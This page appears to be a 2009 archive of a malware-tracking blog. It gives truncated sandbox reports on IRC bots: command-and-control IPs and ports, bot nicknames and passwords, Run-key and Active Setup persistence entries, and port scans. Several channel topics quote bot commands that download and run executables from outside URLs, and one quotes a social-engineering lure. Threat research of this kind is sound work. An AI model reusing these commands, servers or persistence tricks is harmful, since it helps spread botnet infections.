Month: November 2009

213.229.187.47:11438 Interesting ports on 213.229.187.47:Not shown: 1692 filtered portsPORT STATE SERVICE VERSION21/tcp open ftp?25/tcp open smtp?80/tcp open http?110/tcp open pop3?443/tcp open https?

Remote Host Port Number66.252.5.52 22322 NICK ModkxitqgdzxjUSER rnipumlhxm “” “sfm” :rnipumlhxmJOIN #darkwar w4rPONG :d30-58-66.gci.net Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87}] + StubPath = “c:CONFIGS-1-5-21-1482476501-1644491937-682003330-1013ConfDriver.exe” so that ConfDriver.exe runs every time Windows starts * The following directories wereRead more...

5854.jivagaming.com 85.234.148.70 * C&C Server: 85.234.148.70:17402 * Server Password: * Username: thegibson * Nickname: [0008][DEU|XP|LAN|76672] * Channel: #rice (Password: ) * Channeltopic: :.stopm2 |.m2 es esta imagen tuya http://noordfoto.com/facebook.php?= |.y es esta imagen tuya http://noordfoto.com/facebook.php?= |.rar |.zip Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “lsass” = lsass.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMMRead more...

project-h4x0r.com 85.234.148.70 * C&C Server: 85.234.148.70:4244 * Server Password: * Username: XP-8755 * Nickname: [DEU|00|P|60691] * Channel: #yakuza (Password: ) * Channeltopic: :~dl.start http://noordfoto.com/facebook.exe C:crz.exe 1 |~dl http://noordfoto.com/facebook.exe C:crz.exe 1

Remote Host Port Number85.234.148.240 17402 MODE [0008][USA|XP|LAN|73208] +ixJOIN #riceJOIN #inforicePONG 22 MOTDPRIVMSG #rice :[bot]sn] Thread Disabled.PRIVMSG #rice :I’ve sent myself to 0 contacts via MSN.PONG leaf.rice.netNICK [0008][USA|XP|LAN|73208]USER thegibson * 0 :[0008][USA|XP|LAN|73208] PASS jewboy Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + lsass = “lsass.exe” so that lsass.exe runs every time WindowsRead more...

Remote Host Port Number204.232.192.26 5900 NICK VirUs-hhefhkdzUSER VirUs “” “ydf” :8Coded8Ahmed.Ramzey@Hotmail.Com..PASS Virus Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-00WE-AAX5-77EF1D187562} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-00WE-AAX5-77EF1D187562}] + StubPath = “c:RESTOREk-1-3542-4232123213-7676767-8888886JUZZ.exe” so that JUZZ.exe runs every time Windows starts Interesting ports on 204-232-192-26.static.cloud-ips.com (204.232.192.26):Not shown: 1688Read more...

Remote Host Port Number74.86.116.171 85 JOIN #0x9# 12xmas25NICK _00-USA-XP-21180USER http lol lol ovened PASS ms09xx Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + svchost.exe = “%AppData%svchost.exe” so that svchost.exe runs every time Windows starts

Remote Host Port Number193.242.108.49 8069.10.48.106 8076.73.58.215 5900 NICK VirUs-cpvpvowuUSER VirUs “” “fah” :8Coded8VirUs..JOIN #5# VirusPRIVMSG #5# :Success.PONG :Secret.Virus.Gov Now talking in #5#Topic On: [ #5# ] [ !NAZELlol http://ogard.t35.com/NoVaC4.jpeg update.exe 1 ]Topic By: [ TuX ]Modes On: [ #5# ] [ +smntMu ] PASS Virus * The data identified by the following URLs was thenRead more...

Remote Host Port Number82.146.51.252 51987 NICK pLagUe{XP-USA}2333USER pntv 0 0 :pLagUe{XP-USA}2333USERHOST pLagUe{XP-USA}2333MODE pLagUe{XP-USA}2333 +x+iBJOIN #deusexNICK pLagUe{XP-USA}8842USER qtvbw 0 0 :pLagUe{XP-USA}8842USERHOST pLagUe{XP-USA}8842MODE pLagUe{XP-USA}8842 +x+iBNICK pLagUe{XP-USA}8083USER yqei 0 0 :pLagUe{XP-USA}8083USERHOST pLagUe{XP-USA}8083MODE pLagUe{XP-USA}8083 +x+iBNICK pLagUe{XP-USA}4684USER uwscj 0 0 :pLagUe{XP-USA}4684USERHOST pLagUe{XP-USA}4684MODE pLagUe{XP-USA}4684 +x+iBNICK pLagUe{XP-USA}5339USER jgae 0 0 :pLagUe{XP-USA}5339USERHOST pLagUe{XP-USA}5339MODE pLagUe{XP-USA}5339 +x+iB Registry Modifications * The following Registry Keys wereRead more...

o Host By Name: + Requested Host: irc.oftc.net + Resulting Address: 64.62.190.36 o Connection Established: 0 o Socket: 0 * Outgoing Connections + IRC Data # User Name: tliubw # Host Name: 0 # Server Name: # Real Name: [M]USA|74754 # Nick Name: [M]USA|74754 # Non RFC Conform: 1 * Channel o Name: #zindienz *Read more...